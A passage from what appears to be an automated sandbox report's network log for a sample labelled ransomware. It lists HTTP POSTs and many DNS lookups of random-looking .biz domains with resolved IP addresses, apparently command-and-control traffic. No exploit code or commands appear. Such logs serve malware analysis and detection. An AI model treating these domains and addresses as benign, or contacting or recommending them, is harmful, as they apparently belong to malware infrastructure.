POST http://kvbjaur.biz/jxrtranvhdvr

HTTP Response

200
44.221.84.105:80

http://uphca.biz/rtnrhhjhsrf

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://uphca.biz/rtnrhhjhsrf

HTTP Response

200
18.208.156.248:80

http://cjvgcl.biz/wggrsg

http

alg.exe

1.4kB
656 B
6
6

HTTP Request

POST http://cjvgcl.biz/wggrsg

HTTP Response

200
34.211.97.45:80

http://fjumtfnz.biz/veppepsklmyyrtnd

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
666 B
6
6

HTTP Request

POST http://fjumtfnz.biz/veppepsklmyyrtnd

HTTP Response

200
44.221.84.105:80

http://neazudmrq.biz/o

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://neazudmrq.biz/o

HTTP Response

200
18.208.156.248:80

http://pgfsvwx.biz/lapfyboolgtaavf

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://pgfsvwx.biz/lapfyboolgtaavf

HTTP Response

200
34.211.97.45:80

http://hlzfuyy.biz/mgcjwdmxoufvmx

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://hlzfuyy.biz/mgcjwdmxoufvmx

HTTP Response

200
47.129.31.212:80

http://aatcwo.biz/dlwnxuieic

http

alg.exe

1.3kB
52 B
4
1

HTTP Request

POST http://aatcwo.biz/dlwnxuieic
34.246.200.160:80

http://rffxu.biz/mtnbsqhu

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.4kB
44 B
4
1

HTTP Request

POST http://rffxu.biz/mtnbsqhu
44.213.104.86:80

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
47.129.31.212:80

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
18.208.156.248:80

alg.exe

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

pywolwnvd.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

pywolwnvd.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

ssbzmoy.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

177.188.244.54.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

177.188.244.54.in-addr.arpa
8.8.8.8:53

cvgrf.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

107.10.141.18.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

107.10.141.18.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

13.107.21.237

204.79.197.237
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

npukfztj.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

przvgke.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
89 B
1
1

DNS Request

przvgke.biz

DNS Response

172.234.222.138

172.234.222.143
8.8.8.8:53

237.21.107.13.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

237.21.107.13.in-addr.arpa
8.8.8.8:53

105.84.221.44.in-addr.arpa

dns

144 B
127 B
2
1

DNS Request

105.84.221.44.in-addr.arpa

DNS Request

105.84.221.44.in-addr.arpa
8.8.8.8:53

zlenh.biz

dns

alg.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

138.222.234.172.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

138.222.234.172.in-addr.arpa
8.8.8.8:53

uhxqin.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

alg.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

zlenh.biz

dns

alg.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

uhxqin.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

alg.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

vjaxhpbji.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

vjaxhpbji.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

xlfhhhm.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

47.129.31.212
8.8.8.8:53

ifsaia.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

ifsaia.biz

DNS Response

13.251.16.150
8.8.8.8:53

212.31.129.47.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

212.31.129.47.in-addr.arpa
8.8.8.8:53

saytjshyf.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

saytjshyf.biz

DNS Response

44.221.84.105
8.8.8.8:53

vcddkls.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

150.16.251.13.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

150.16.251.13.in-addr.arpa
8.8.8.8:53

xlfhhhm.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

47.129.31.212
8.8.8.8:53

fwiwk.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

fwiwk.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

ifsaia.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

ifsaia.biz

DNS Response

13.251.16.150
8.8.8.8:53

143.222.234.172.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

143.222.234.172.in-addr.arpa
8.8.8.8:53

tbjrpv.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160
8.8.8.8:53

saytjshyf.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

saytjshyf.biz

DNS Response

44.221.84.105
8.8.8.8:53

deoci.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

18.208.156.248
8.8.8.8:53

vcddkls.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

gytujflc.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

gytujflc.biz

DNS Response

208.100.26.245
8.8.8.8:53

160.200.246.34.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

160.200.246.34.in-addr.arpa
8.8.8.8:53

248.156.208.18.in-addr.arpa

dns

73 B
129 B
1
1

DNS Request

248.156.208.18.in-addr.arpa
8.8.8.8:53

qaynky.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

qaynky.biz

DNS Response

13.251.16.150
8.8.8.8:53

fwiwk.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

fwiwk.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

245.26.100.208.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

245.26.100.208.in-addr.arpa
8.8.8.8:53

tbjrpv.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160
8.8.8.8:53

bumxkqgxu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

deoci.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

18.208.156.248
8.8.8.8:53

dwrqljrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

dwrqljrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

gytujflc.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

gytujflc.biz

DNS Response

208.100.26.245
8.8.8.8:53

nqwjmb.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200
8.8.8.8:53

qaynky.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

qaynky.biz

DNS Response

13.251.16.150
8.8.8.8:53

ytctnunms.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34
8.8.8.8:53

myups.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

myups.biz

DNS Response

165.160.13.20

165.160.15.20
8.8.8.8:53

bumxkqgxu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

dwrqljrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

dwrqljrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

oshhkdluh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

54.244.188.177
8.8.8.8:53

200.78.164.35.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

200.78.164.35.in-addr.arpa
8.8.8.8:53

34.10.94.3.in-addr.arpa

dns

69 B
121 B
1
1

DNS Request

34.10.94.3.in-addr.arpa
8.8.8.8:53

20.13.160.165.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

20.13.160.165.in-addr.arpa
8.8.8.8:53

nqwjmb.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200
8.8.8.8:53

yunalwv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

ytctnunms.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34
8.8.8.8:53

jpskm.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

jpskm.biz

DNS Response

34.211.97.45
8.8.8.8:53

myups.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

myups.biz

DNS Response

165.160.15.20

165.160.13.20
8.8.8.8:53

lrxdmhrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

45.97.211.34.in-addr.arpa

dns

128 B
206 B
2
2

DNS Request

45.97.211.34.in-addr.arpa

DNS Request

kvbjaur.biz

DNS Response

54.244.188.177
8.8.8.8:53

20.15.160.165.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

20.15.160.165.in-addr.arpa
8.8.8.8:53

oshhkdluh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

54.244.188.177
8.8.8.8:53

wllvnzb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107
8.8.8.8:53

yunalwv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

jpskm.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

jpskm.biz

DNS Response

34.211.97.45
8.8.8.8:53

gnqgo.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

gnqgo.biz

DNS Response

18.208.156.248
8.8.8.8:53

lrxdmhrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

jhvzpcfg.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

44.221.84.105
8.8.8.8:53

acwjcqqv.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107
8.8.8.8:53

wllvnzb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107
8.8.8.8:53

lejtdj.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

lejtdj.biz
8.8.8.8:53

gnqgo.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

gnqgo.biz

DNS Response

18.208.156.248
8.8.8.8:53

vyome.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

vyome.biz

DNS Response

44.213.104.86
8.8.8.8:53

jhvzpcfg.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

44.221.84.105
8.8.8.8:53

yauexmxk.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

yauexmxk.biz

DNS Response

18.208.156.248
8.8.8.8:53

acwjcqqv.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107
8.8.8.8:53

iuzpxe.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

iuzpxe.biz

DNS Response

13.251.16.150
8.8.8.8:53

5.173.189.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

5.173.189.20.in-addr.arpa

DNS Request

5.173.189.20.in-addr.arpa
8.8.8.8:53

86.104.213.44.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

86.104.213.44.in-addr.arpa
8.8.8.8:53

lejtdj.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

lejtdj.biz
8.8.8.8:53

vyome.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

vyome.biz

DNS Response

44.213.104.86
8.8.8.8:53

yauexmxk.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

yauexmxk.biz

DNS Response

18.208.156.248
8.8.8.8:53

iuzpxe.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

iuzpxe.biz

DNS Response

13.251.16.150
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

sxmiywsfv.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

sxmiywsfv.biz

DNS Response

13.251.16.150
8.8.8.8:53

sxmiywsfv.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

sxmiywsfv.biz

DNS Response

13.251.16.150
8.8.8.8:53

vrrazpdh.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

vrrazpdh.biz

DNS Response

34.211.97.45
8.8.8.8:53

ftxlah.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

ftxlah.biz

DNS Response

47.129.31.212
8.8.8.8:53

typgfhb.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

typgfhb.biz

DNS Response

13.251.16.150
8.8.8.8:53

esuzf.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

esuzf.biz

DNS Response

34.211.97.45
8.8.8.8:53

gvijgjwkh.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

gvijgjwkh.biz

DNS Response

3.94.10.34
8.8.8.8:53

vrrazpdh.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

vrrazpdh.biz

DNS Response

34.211.97.45
8.8.8.8:53

qpnczch.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

qpnczch.biz

DNS Response

44.213.104.86
8.8.8.8:53

ftxlah.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

ftxlah.biz

DNS Response

47.129.31.212
8.8.8.8:53

brsua.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

brsua.biz

DNS Response

3.254.94.185
8.8.8.8:53

dlynankz.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

dlynankz.biz

DNS Response

85.214.228.140
8.8.8.8:53

185.94.254.3.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

185.94.254.3.in-addr.arpa
8.8.8.8:53

oflybfv.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

oflybfv.biz

DNS Response

47.129.31.212
8.8.8.8:53

typgfhb.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

typgfhb.biz

DNS Response

13.251.16.150
8.8.8.8:53

140.228.214.85.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

140.228.214.85.in-addr.arpa
8.8.8.8:53

yhqqc.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

yhqqc.biz

DNS Response

34.211.97.45
8.8.8.8:53

esuzf.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

esuzf.biz

DNS Response

34.211.97.45
8.8.8.8:53

mnjmhp.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

mnjmhp.biz

DNS Response

47.129.31.212
8.8.8.8:53

gvijgjwkh.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

gvijgjwkh.biz

DNS Response

3.94.10.34
8.8.8.8:53

qpnczch.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

qpnczch.biz

DNS Response

44.213.104.86
8.8.8.8:53

opowhhece.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

opowhhece.biz

DNS Response

18.208.156.248
8.8.8.8:53

brsua.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

brsua.biz

DNS Response

3.254.94.185
8.8.8.8:53

zjbpaao.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
119 B
1
1

DNS Request

zjbpaao.biz
8.8.8.8:53

jdhhbs.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

jdhhbs.biz

DNS Response

13.251.16.150
8.8.8.8:53

dlynankz.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

dlynankz.biz

DNS Response

85.214.228.140
8.8.8.8:53

oflybfv.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

oflybfv.biz

DNS Response

47.129.31.212
8.8.8.8:53

mgmsclkyu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

mgmsclkyu.biz

DNS Response

34.246.200.160
8.8.8.8:53

yhqqc.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

yhqqc.biz

DNS Response

34.211.97.45
8.8.8.8:53

warkcdu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

warkcdu.biz

DNS Response

18.141.10.107
8.8.8.8:53

mnjmhp.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

mnjmhp.biz

DNS Response

47.129.31.212
8.8.8.8:53

gcedd.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

gcedd.biz

DNS Response

13.251.16.150
8.8.8.8:53

opowhhece.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

opowhhece.biz

DNS Response

18.208.156.248
8.8.8.8:53

zjbpaao.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
119 B
1
1

DNS Request

zjbpaao.biz
8.8.8.8:53

jdhhbs.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

jdhhbs.biz

DNS Response

13.251.16.150
8.8.8.8:53

jwkoeoqns.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

jwkoeoqns.biz

DNS Response

18.208.156.248
8.8.8.8:53

xccjj.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

xccjj.biz

DNS Response

44.213.104.86
8.8.8.8:53

hehckyov.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

hehckyov.biz

DNS Response

44.221.84.105
8.8.8.8:53

rynmcq.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

rynmcq.biz

DNS Response

54.244.188.177
8.8.8.8:53

mgmsclkyu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

mgmsclkyu.biz

DNS Response

34.246.200.160
8.8.8.8:53

warkcdu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

warkcdu.biz

DNS Response

18.141.10.107
8.8.8.8:53

uaafd.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

uaafd.biz

DNS Response

3.254.94.185
8.8.8.8:53

eufxebus.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

eufxebus.biz

DNS Response

18.141.10.107
8.8.8.8:53

gcedd.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

gcedd.biz

DNS Response

13.251.16.150
8.8.8.8:53

pwlqfu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

pwlqfu.biz

DNS Response

34.246.200.160
8.8.8.8:53

rrqafepng.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

rrqafepng.biz

DNS Response

47.129.31.212
8.8.8.8:53

jwkoeoqns.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

jwkoeoqns.biz

DNS Response

18.208.156.248
8.8.8.8:53

xccjj.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

xccjj.biz

DNS Response

44.213.104.86
8.8.8.8:53

hehckyov.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

hehckyov.biz

DNS Response

44.221.84.105
8.8.8.8:53

ctdtgwag.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

ctdtgwag.biz

DNS Response

3.94.10.34
8.8.8.8:53

rynmcq.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

rynmcq.biz

DNS Response

54.244.188.177
8.8.8.8:53

tnevuluw.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

tnevuluw.biz

DNS Response

35.164.78.200
8.8.8.8:53

uaafd.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

uaafd.biz

DNS Response

3.254.94.185
8.8.8.8:53

whjovd.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

whjovd.biz

DNS Response

18.141.10.107
8.8.8.8:53

eufxebus.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

eufxebus.biz

DNS Response

18.141.10.107
8.8.8.8:53

gjogvvpsf.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

118 B
75 B
2
1

DNS Request

gjogvvpsf.biz

DNS Request

gjogvvpsf.biz

DNS Response

208.100.26.245
8.8.8.8:53

reczwga.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

reczwga.biz

DNS Response

44.221.84.105
8.8.8.8:53

bghjpy.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

bghjpy.biz

DNS Response

34.211.97.45
8.8.8.8:53

damcprvgv.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

damcprvgv.biz

DNS Response

18.208.156.248
8.8.8.8:53

ocsvqjg.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

171 B
73 B
3
1

DNS Request

ocsvqjg.biz

DNS Request

ocsvqjg.biz

DNS Request

ocsvqjg.biz

DNS Response

3.254.94.185
8.8.8.8:53

pwlqfu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

112 B
144 B
2
2

DNS Request

pwlqfu.biz

DNS Request

pwlqfu.biz

DNS Response

34.246.200.160

DNS Response

34.246.200.160
8.8.8.8:53

rrqafepng.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

118 B
150 B
2
2

DNS Request

rrqafepng.biz

DNS Request

rrqafepng.biz

DNS Response

47.129.31.212

DNS Response

47.129.31.212
8.8.8.8:53

ywffr.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

ywffr.biz

DNS Response

54.244.188.177
8.8.8.8:53

ecxbwt.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

112 B
72 B
2
1

DNS Request

ecxbwt.biz

DNS Request

ecxbwt.biz

DNS Response

54.244.188.177
8.8.8.8:53

ctdtgwag.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

ctdtgwag.biz

DNS Response

3.94.10.34
8.8.8.8:53

tnevuluw.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

116 B
148 B
2
2

DNS Request

